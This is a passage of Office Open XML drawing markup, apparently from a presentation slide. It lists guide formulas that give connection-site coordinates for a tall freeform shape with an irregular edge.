              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 449742 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 436211 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 430964 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 435318 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 462415 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 462722 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 462749 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 461364 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 465190 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 493180 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 510743 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 512991 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 499826 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 500327 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 464645 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 366598 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY122" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY123" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY124" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY125" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY126" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY127" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY128" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY129" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY130" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY131" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY132" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY133" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY134" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY135" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 449742 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 436211 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 430964 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 435318 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 462415 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 462722 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 462749 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 461364 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 465190 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 493180 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 510743 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 512991 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 499826 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 500327 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 366598 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 315516 w 1349253"/>
